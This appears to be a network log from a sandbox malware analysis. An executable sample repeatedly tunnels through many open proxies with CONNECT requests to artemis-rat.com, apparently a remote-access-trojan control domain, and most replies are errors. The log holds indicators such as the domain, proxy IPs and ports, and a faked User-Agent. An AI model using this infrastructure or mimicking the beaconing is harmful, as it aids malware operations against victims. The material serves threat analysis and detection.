                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2136192.168.2.55508961.7.149.480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.945147038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.381443977 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2137192.168.2.554914117.160.250.16399903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.945147038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.701975107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592717886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.270524025 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.269891977 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:05.269589901 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.269341946 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:41.270391941 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:29.271441936 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2138192.168.2.551350142.54.237.3441453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.945194960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2139192.168.2.552875202.74.48.6610883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.945312023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2140192.168.2.55299291.142.222.84570413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.066212893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2141192.168.2.55301892.205.110.47171583876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.112971067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2142192.168.2.55303491.229.28.10531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.128144026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2143192.168.2.55515438.54.16.97803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.129633904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.484189987 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Content-Length: 19
                                                                                                                                                                                                                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                            Data Ascii: 404 page not found


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2144192.168.2.555152188.255.220.11066663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.129906893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.561959982 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 719
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Wed, 14 Feb 2024 22:22:06 GMT
                                                                                                                                                                                                                                                            Expires: Wed, 14 Feb 2024 22:22:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2145192.168.2.552997213.165.168.19098983876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.134079933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2146192.168.2.55497751.155.10.080003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.142860889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2147192.168.2.55315674.208.12.35431003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.156254053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2148192.168.2.553141167.99.236.14803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.172750950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.202070951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.217277050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.217505932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2149192.168.2.55316092.204.135.37204913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.173943996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2150192.168.2.55504072.195.34.5941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.178560972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2151192.168.2.55528545.67.210.4733893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.186553955 CET131INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.353976011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2152192.168.2.553238186.46.34.209993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.218446016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.624736071 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2153192.168.2.553260178.33.163.15675793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.218508005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389256001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405328989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.405430079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2154192.168.2.553253200.39.154.19993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.218724012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2155192.168.2.553221146.59.18.246409753876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.218945026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389271021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405328989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2156192.168.2.553072185.189.100.20080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.223484039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
